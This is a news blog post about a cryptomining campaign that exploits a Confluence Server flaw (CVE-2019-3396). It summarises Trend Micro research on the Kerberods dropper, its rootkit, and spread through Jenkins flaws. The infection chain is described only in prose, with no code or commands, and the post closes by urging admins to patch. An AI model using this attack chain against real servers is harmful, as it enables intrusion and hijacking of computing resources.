Hackers attack Confluence Servers, hijack power for cryptocurrency mining. Illicit Monero mining is the goal. According to Trend Micro, attackers are harnessing CVE-2019–3396, a bug present in the Widget Connector macro in Atlassian Confluence Server, which permits path traversal and remote code execution via server-side injection.

Atlassian released a patch on March 20, 2019, to resolve the security flaw alongside an accompanying fix for CVE-2019-3395, a WebDAV endpoint issue which permits attackers to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.

However, it seems that unpatched Confluence systems are being widely exploited in the new campaign, which focuses on mining Monero.

The researchers, Augusto Remillano II and Robert Malagad, say that  CVE-2019–3396 was previously being used to drop the Gandcrab ransomware, and now, the bug is also being utilized to drop rootkits and cryptocurrency mining malware onto vulnerable systems.

The infection chain begins with a remote command which is sent to fetch a shell script from Pastebin. This script contains kill process capabilities and is able to download and execute a second shell script, again from a Pastebin source, eventually leading to a third Pastebin shell script download.

A Trojan dropper, known as Kerberods, is then fetched and installed. This malware drops the “khugepageds” cryptocurrency miner — flagged as Coinminer.Linux.MALXMR.UWEJI — alongside the rootkit component.

Hackers attack Confluence Servers, hijack power for cryptocurrency mining

Hackers attack Confluence Servers, hijack power for cryptocurrency mining

The rootkit, which is designed to mask the cryptocurrency miner’s activities, is dropped in a code format which is then compiled in GCC.

Kerberods is also able to propagate over networks via SSH through the exploit of CVE-2019-1003001 and CVE-2019-1003000, which are Jenkins automaton server security flaws that can result in arbitrary code execution.

Both Kerberods and its rootkit use custom packers to make analysis more challenging. The rootkit is not only able to hide the mining process but is also able to forge the infected machine’s CPU usage — in turn, concealing one of the main indicators of a cryptocurrency mining malware operation.

Given the active exploit of Confluence Servers in the wild, it is recommended that admins apply Atlassian’s patches without delay.


Related Posts:

Doomsday Docker security hole uncovered(Opens in a new browser tab)

Free online cybersecurity training resources

Connected through code, Choose Your Platform!

About the Author: Bernard Aybout

In the land of bytes and bits, a father of three sits, With a heart for tech and coding kits, in IT he never quits. At Magna's door, he took his stance, in Canada's wide expanse, At Karmax Heavy Stamping - Cosma's dance, he gave his career a chance. With a passion deep for teaching code, to the young minds he showed, The path where digital seeds are sowed, in critical thinking mode. But alas, not all was bright and fair, at Magna's lair, oh despair, Harassment, intimidation, a chilling air, made the workplace hard to bear. Management's maze and morale's dip, made our hero's spirit flip, In a demoralizing grip, his well-being began to slip. So he bid adieu to Magna's scene, from the division not so serene, Yet in tech, his interest keen, continues to inspire and convene.